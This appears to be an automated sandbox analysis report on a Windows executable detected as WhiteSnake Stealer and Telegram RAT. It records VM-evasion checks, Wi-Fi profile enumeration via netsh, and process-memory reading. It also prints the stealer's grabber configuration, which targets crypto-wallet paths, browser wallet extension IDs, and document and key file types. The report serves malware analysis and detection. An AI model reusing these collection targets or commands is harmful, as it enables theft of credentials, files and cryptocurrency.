Source: C:\Users\user\Desktop\73ybGtnYXx.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem

Source: C:\Users\user\Desktop\73ybGtnYXx.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Thread delayed: delay time: 599563	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Thread delayed: delay time: 599344	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Thread delayed: delay time: 599234	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Thread delayed: delay time: 599120	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Thread delayed: delay time: 599016	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Thread delayed: delay time: 598906	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Thread delayed: delay time: 598797	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Thread delayed: delay time: 598687	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Thread delayed: delay time: 598578	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Thread delayed: delay time: 598469	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Thread delayed: delay time: 598359	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Thread delayed: delay time: 598250	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Thread delayed: delay time: 598141	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Thread delayed: delay time: 598031	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Thread delayed: delay time: 597922	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Thread delayed: delay time: 597813	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Thread delayed: delay time: 597703	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Thread delayed: delay time: 597594	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Thread delayed: delay time: 597484	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Thread delayed: delay time: 597375	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Thread delayed: delay time: 597266	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Thread delayed: delay time: 597156	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Thread delayed: delay time: 597047	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Thread delayed: delay time: 596938	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Thread delayed: delay time: 596813	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Thread delayed: delay time: 596688	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Thread delayed: delay time: 596563	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Thread delayed: delay time: 596453	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Thread delayed: delay time: 596344	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Thread delayed: delay time: 596219	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Thread delayed: delay time: 596109	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Thread delayed: delay time: 596000	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Thread delayed: delay time: 595891	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Thread delayed: delay time: 595781	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Thread delayed: delay time: 595672	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Thread delayed: delay time: 595562	Jump to behavior

Source: 73ybGtnYXx.exe	Binary or memory string: qemu'
Source: 73ybGtnYXx.exe, 00000000.00000002.1802364192.000001B60E1C8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}
Source: 73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B62050A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: 73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B62050A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696494690f
Source: 73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B62050A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696494690
Source: 73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B62050A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696494690s
Source: 73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B62050A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: 73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B62050A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: 73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B62050A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: 73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B62050A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: 73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B62050A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: 73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B62050A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: 73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B62050A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: 73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B62050A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: 73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B62050A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: 73ybGtnYXx.exe, 00000000.00000002.1817181521.000001B62986D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\1
Source: 73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B62050A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: 73ybGtnYXx.exe, 00000000.00000002.1813211192.000001B6285C2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll^
Source: 73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B62050A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: 73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B62050A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: 73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B62050A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: 73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B62050A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: 73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B62050A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696494690o
Source: 73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B62050A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: 73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B62050A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: 73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B62050A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696494690j
Source: 73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B62050A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696494690
Source: 73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B62050A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: 73ybGtnYXx.exe, 00000000.00000002.1813211192.000001B6285C2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
Source: 73ybGtnYXx.exe, 00000000.00000002.1817181521.000001B62984D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: 73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B62050A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: 73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B62050A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: 73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B62050A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: 73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B62050A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: 73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B62050A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: 73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B62050A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: 73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B62050A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696494690\|UE

Source: C:\Users\user\Desktop\73ybGtnYXx.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\73ybGtnYXx.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\73ybGtnYXx.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: 73ybGtnYXx.exe, ypzCTr.cs	Reference to suspicious API methods: OpenProcess(1040u, bInheritHandle: false, nDC4L.Id)
Source: 73ybGtnYXx.exe, ypzCTr.cs	Reference to suspicious API methods: ReadProcessMemory(intPtr, lpBuffer.BaseAddress, array, array.Length, out var lpNumberOfBytesRead)
Source: 73ybGtnYXx.exe, hm6.cs	Reference to suspicious API methods: GetProcAddress(hH, e3A)

Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles\|findstr /R /C:"[ ]:[ ]"	Jump to behavior
Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid \| findstr "SSID BSSID Signal"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /R /C:"[ ]:[ ]"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr "SSID BSSID Signal"	Jump to behavior

Source: C:\Users\user\Desktop\73ybGtnYXx.exe	Queries volume information: C:\Users\user\Desktop\73ybGtnYXx.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\73ybGtnYXx.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Uses netsh to modify the Windows network and firewall settings

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles

Stealing of Sensitive Information

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: 73ybGtnYXx.exe PID: 4296, type: MEMORYSTR

Yara detected WhiteSnake Stealer

Source: Yara match	File source: 00000000.00000002.1802838453.000001B60FC01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 73ybGtnYXx.exe PID: 4296, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B610170000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \Electrum-LTC\wallets
Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B610008000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: s\Exodus</string></args></command><command name="0"><args><string>%AppData%\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxLiberty</string></args></command><command name="0"><args><string>%AppData%\Jaxx\Local Storage\leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxClassic</string></args></command><command name="0"><args><string>%UserProfile%\Documents\Monero\wallets</string><string>\</string><string>Grabber\Wallets\Monero</string></args></command><command name="0"><args><string>%AppData%\MyMonero</string><string>FundsRequests;PasswordMeta;Wallets</string><string>Grabber\Wallets\MyMonero</string></args></command><command name="3"><args><string>Metamask</string><string>nkbihfbeogaeaoehlefnkodbefgpgknn</string></args></command><command name="3"><args><string>Ronin</string><string>fnjhmkhhmkbjkkabndcnnogagogbneec</string></args></command><command name="3"><args><string>BinanceChain</string><string>fhbohimaelbohpjbbldcngcnapndodjp</string></args></command><command name="3"><args><string>TronLink</string><string>ibnejdfjmmkpcnlpebklmnkoeoihofec</string></args></command><command name="3"><args><string>Phantom</string><string>bfnaelmomeimhlpmgjnjophhpkkoljpa</string></args></command><command name="0"><args><string>%UserProfile%\Desktop</string><string>doc.;docx.;xls.;xlsx.;ppt.;pptx.;pdf.;txt.;rtf.;odt.;ods.;odp.;csv.;html.;htm.;epub.;md.;tex.;wpd.;wps.;pub.;xps.;odg.;ott.;ots.;otp.;msg.;eml.;crt.;cer.;pem.;der.;p7b.;p7c.;pfx.;p12.;sst.;csr.;key.;private.;sig.;signature.;p7s.;asc.;gpg.;authenticode.;kdb.;kdbx.;agilekeychain.;opvault.;lastpass.;psafe3.;ovpn.;log.;cfg.;conf.;c.;cpp.;cc.;cxx.;hpp.;cs.;java.;ts.;php.;rb.;rs.;swift.;kt.;kts.;pl.;r.;sh.;lua.;py.;go.;</string><string>Grabber\Desktop Files</string></args></command><command name="0"><args><string>%UserProfile%\Documents</string><string>doc.;docx.;xls.;xlsx.;ppt.;pptx.;pdf.;txt.;rtf.;odt.;ods.;odp.;csv.;html.;htm.;epub.;md.;tex.;wpd.;wps.;pub.;xps.;odg.;ott.;ots.;otp.;msg.;eml.;crt.;cer.;pem.;der.;p7b.;p7c.;pfx.;p12.;sst.;csr.;key.;private.;sig.;signature.;p7s.;asc.;gpg.;authenticode.;kdb.;kdbx.;agilekeychain.;opvault.;lastpass.;psafe3.;ovpn.;log.;cfg.;conf.;c.;cpp.;cc.;cxx.;hpp.;cs.;java.;ts.;php.;rb.;rs.;swift.;kt.;kts.;pl.;r.;sh.;lua.;py.;go.;</string><string>Grabber\Documents</string></args></command><command name="0"><args><string>%UserProfile%\Downloads</string><string>doc.;docx.;xls.;xlsx.;ppt.;pptx.;pdf.;txt.;rtf.;odt.;ods.;odp.;csv.;html.;htm.;epub.;md.;tex.;wpd.;wps.;pub.;xps.;odg.;ott.;ots.;otp.;msg.;eml.;crt.;cer.;pem.;der.;p7b.;p7c.;pfx.;p12.;sst.;csr.;key.;private.;sig.;signature.;p7s.;asc.;gpg.;authenticode.;kdb.;kdbx.;agilekeychain.;opvault.;lastpass.;psafe3.;ovpn.;log.;cfg.;conf.;c.;cpp.*;cc.
Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B610008000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: s\Exodus</string></args></command><command name="0"><args><string>%AppData%\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxLiberty</string></args></command><command name="0"><args><string>%AppData%\Jaxx\Local Storage\leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxClassic</string></args></command><command name="0"><args><string>%UserProfile%\Documents\Monero\wallets</string><string>\</string><string>Grabber\Wallets\Monero</string></args></command><command name="0"><args><string>%AppData%\MyMonero</string><string>FundsRequests;PasswordMeta;Wallets</string><string>Grabber\Wallets\MyMonero</string></args></command><command name="3"><args><string>Metamask</string><string>nkbihfbeogaeaoehlefnkodbefgpgknn</string></args></command><command name="3"><args><string>Ronin</string><string>fnjhmkhhmkbjkkabndcnnogagogbneec</string></args></command><command name="3"><args><string>BinanceChain</string><string>fhbohimaelbohpjbbldcngcnapndodjp</string></args></command><command name="3"><args><string>TronLink</string><string>ibnejdfjmmkpcnlpebklmnkoeoihofec</string></args></command><command name="3"><args><string>Phantom</string><string>bfnaelmomeimhlpmgjnjophhpkkoljpa</string></args></command><command name="0"><args><string>%UserProfile%\Desktop</string><string>doc.;docx.;xls.;xlsx.;ppt.;pptx.;pdf.;txt.;rtf.;odt.;ods.;odp.;csv.;html.;htm.;epub.;md.;tex.;wpd.;wps.;pub.;xps.;odg.;ott.;ots.;otp.;msg.;eml.;crt.;cer.;pem.;der.;p7b.;p7c.;pfx.;p12.;sst.;csr.;key.;private.;sig.;signature.;p7s.;asc.;gpg.;authenticode.;kdb.;kdbx.;agilekeychain.;opvault.;lastpass.;psafe3.;ovpn.;log.;cfg.;conf.;c.;cpp.;cc.;cxx.;hpp.;cs.;java.;ts.;php.;rb.;rs.;swift.;kt.;kts.;pl.;r.;sh.;lua.;py.;go.;</string><string>Grabber\Desktop Files</string></args></command><command name="0"><args><string>%UserProfile%\Documents</string><string>doc.;docx.;xls.;xlsx.;ppt.;pptx.;pdf.;txt.;rtf.;odt.;ods.;odp.;csv.;html.;htm.;epub.;md.;tex.;wpd.;wps.;pub.;xps.;odg.;ott.;ots.;otp.;msg.;eml.;crt.;cer.;pem.;der.;p7b.;p7c.;pfx.;p12.;sst.;csr.;key.;private.;sig.;signature.;p7s.;asc.;gpg.;authenticode.;kdb.;kdbx.;agilekeychain.;opvault.;lastpass.;psafe3.;ovpn.;log.;cfg.;conf.;c.;cpp.;cc.;cxx.;hpp.;cs.;java.;ts.;php.;rb.;rs.;swift.;kt.;kts.;pl.;r.;sh.;lua.;py.;go.;</string><string>Grabber\Documents</string></args></command><command name="0"><args><string>%UserProfile%\Downloads</string><string>doc.;docx.;xls.;xlsx.;ppt.;pptx.;pdf.;txt.;rtf.;odt.;ods.;odp.;csv.;html.;htm.;epub.;md.;tex.;wpd.;wps.;pub.;xps.;odg.;ott.;ots.;otp.;msg.;eml.;crt.;cer.;pem.;der.;p7b.;p7c.;pfx.;p12.;sst.;csr.;key.;private.;sig.;signature.;p7s.;asc.;gpg.;authenticode.;kdb.;kdbx.;agilekeychain.;opvault.;lastpass.;psafe3.;ovpn.;log.;cfg.;conf.;c.;cpp.*;cc.
Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B610008000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: s\Exodus</string></args></command><command name="0"><args><string>%AppData%\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxLiberty</string></args></command><command name="0"><args><string>%AppData%\Jaxx\Local Storage\leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxClassic</string></args></command><command name="0"><args><string>%UserProfile%\Documents\Monero\wallets</string><string>\</string><string>Grabber\Wallets\Monero</string></args></command><command name="0"><args><string>%AppData%\MyMonero</string><string>FundsRequests;PasswordMeta;Wallets</string><string>Grabber\Wallets\MyMonero</string></args></command><command name="3"><args><string>Metamask</string><string>nkbihfbeogaeaoehlefnkodbefgpgknn</string></args></command><command name="3"><args><string>Ronin</string><string>fnjhmkhhmkbjkkabndcnnogagogbneec</string></args></command><command name="3"><args><string>BinanceChain</string><string>fhbohimaelbohpjbbldcngcnapndodjp</string></args></command><command name="3"><args><string>TronLink</string><string>ibnejdfjmmkpcnlpebklmnkoeoihofec</string></args></command><command name="3"><args><string>Phantom</string><string>bfnaelmomeimhlpmgjnjophhpkkoljpa</string></args></command><command name="0"><args><string>%UserProfile%\Desktop</string><string>doc.;docx.;xls.;xlsx.;ppt.;pptx.;pdf.;txt.;rtf.;odt.;ods.;odp.;csv.;html.;htm.;epub.;md.;tex.;wpd.;wps.;pub.;xps.;odg.;ott.;ots.;otp.;msg.;eml.;crt.;cer.;pem.;der.;p7b.;p7c.;pfx.;p12.;sst.;csr.;key.;private.;sig.;signature.;p7s.;asc.;gpg.;authenticode.;kdb.;kdbx.;agilekeychain.;opvault.;lastpass.;psafe3.;ovpn.;log.;cfg.;conf.;c.;cpp.;cc.;cxx.;hpp.;cs.;java.;ts.;php.;rb.;rs.;swift.;kt.;kts.;pl.;r.;sh.;lua.;py.;go.;</string><string>Grabber\Desktop Files</string></args></command><command name="0"><args><string>%UserProfile%\Documents</string><string>doc.;docx.;xls.;xlsx.;ppt.;pptx.;pdf.;txt.;rtf.;odt.;ods.;odp.;csv.;html.;htm.;epub.;md.;tex.;wpd.;wps.;pub.;xps.;odg.;ott.;ots.;otp.;msg.;eml.;crt.;cer.;pem.;der.;p7b.;p7c.;pfx.;p12.;sst.;csr.;key.;private.;sig.;signature.;p7s.;asc.;gpg.;authenticode.;kdb.;kdbx.;agilekeychain.;opvault.;lastpass.;psafe3.;ovpn.;log.;cfg.;conf.;c.;cpp.;cc.;cxx.;hpp.;cs.;java.;ts.;php.;rb.;rs.;swift.;kt.;kts.;pl.;r.;sh.;lua.;py.;go.;</string><string>Grabber\Documents</string></args></command><command name="0"><args><string>%UserProfile%\Downloads</string><string>doc.;docx.;xls.;xlsx.;ppt.;pptx.;pdf.;txt.;rtf.;odt.;ods.;odp.;csv.;html.;htm.;epub.;md.;tex.;wpd.;wps.;pub.;xps.;odg.;ott.;ots.;otp.;msg.;eml.;crt.;cer.;pem.;der.;p7b.;p7c.;pfx.;p12.;sst.;csr.;key.;private.;sig.;signature.;p7s.;asc.;gpg.;authenticode.;kdb.;kdbx.;agilekeychain.;opvault.;lastpass.;psafe3.;ovpn.;log.;cfg.;conf.;c.;cpp.*;cc.
Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B610008000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: s\Exodus</string></args></command><command name="0"><args><string>%AppData%\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxLiberty</string></args></command><command name="0"><args><string>%AppData%\Jaxx\Local Storage\leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxClassic</string></args></command><command name="0"><args><string>%UserProfile%\Documents\Monero\wallets</string><string>\</string><string>Grabber\Wallets\Monero</string></args></command><command name="0"><args><string>%AppData%\MyMonero</string><string>FundsRequests;PasswordMeta;Wallets</string><string>Grabber\Wallets\MyMonero</string></args></command><command name="3"><args><string>Metamask</string><string>nkbihfbeogaeaoehlefnkodbefgpgknn</string></args></command><command name="3"><args><string>Ronin</string><string>fnjhmkhhmkbjkkabndcnnogagogbneec</string></args></command><command name="3"><args><string>BinanceChain</string><string>fhbohimaelbohpjbbldcngcnapndodjp</string></args></command><command name="3"><args><string>TronLink</string><string>ibnejdfjmmkpcnlpebklmnkoeoihofec</string></args></command><command name="3"><args><string>Phantom</string><string>bfnaelmomeimhlpmgjnjophhpkkoljpa</string></args></command><command name="0"><args><string>%UserProfile%\Desktop</string><string>doc.;docx.;xls.;xlsx.;ppt.;pptx.;pdf.;txt.;rtf.;odt.;ods.;odp.;csv.;html.;htm.;epub.;md.;tex.;wpd.;wps.;pub.;xps.;odg.;ott.;ots.;otp.;msg.;eml.;crt.;cer.;pem.;der.;p7b.;p7c.;pfx.;p12.;sst.;csr.;key.;private.;sig.;signature.;p7s.;asc.;gpg.;authenticode.;kdb.;kdbx.;agilekeychain.;opvault.;lastpass.;psafe3.;ovpn.;log.;cfg.;conf.;c.;cpp.;cc.;cxx.;hpp.;cs.;java.;ts.;php.;rb.;rs.;swift.;kt.;kts.;pl.;r.;sh.;lua.;py.;go.;</string><string>Grabber\Desktop Files</string></args></command><command name="0"><args><string>%UserProfile%\Documents</string><string>doc.;docx.;xls.;xlsx.;ppt.;pptx.;pdf.;txt.;rtf.;odt.;ods.;odp.;csv.;html.;htm.;epub.;md.;tex.;wpd.;wps.;pub.;xps.;odg.;ott.;ots.;otp.;msg.;eml.;crt.;cer.;pem.;der.;p7b.;p7c.;pfx.;p12.;sst.;csr.;key.;private.;sig.;signature.;p7s.;asc.;gpg.;authenticode.;kdb.;kdbx.;agilekeychain.;opvault.;lastpass.;psafe3.;ovpn.;log.;cfg.;conf.;c.;cpp.;cc.;cxx.;hpp.;cs.;java.;ts.;php.;rb.;rs.;swift.;kt.;kts.;pl.;r.;sh.;lua.;py.;go.;</string><string>Grabber\Documents</string></args></command><command name="0"><args><string>%UserProfile%\Downloads</string><string>doc.;docx.;xls.;xlsx.;ppt.;pptx.;pdf.;txt.;rtf.;odt.;ods.;odp.;csv.;html.;htm.;epub.;md.;tex.;wpd.;wps.;pub.;xps.;odg.;ott.;ots.;otp.;msg.;eml.;crt.;cer.;pem.;der.;p7b.;p7c.;pfx.;p12.;sst.;csr.;key.;private.;sig.;signature.;p7s.;asc.;gpg.;authenticode.;kdb.;kdbx.;agilekeychain.;opvault.;lastpass.;psafe3.;ovpn.;log.;cfg.;conf.;c.;cpp.*;cc.
Source: 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B610008000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: s\Exodus</string></args></command><command name="0"><args><string>%AppData%\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxLiberty</string></args></command><command name="0"><args><string>%AppData%\Jaxx\Local Storage\leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxClassic</string></args></command><command name="0"><args><string>%UserProfile%\Documents\Monero\wallets</string><string>\</string><string>Grabber\Wallets\Monero</string></args></command><command name="0"><args><string>%AppData%\MyMonero</string><string>FundsRequests;PasswordMeta;Wallets</string><string>Grabber\Wallets\MyMonero</string></args></command><command 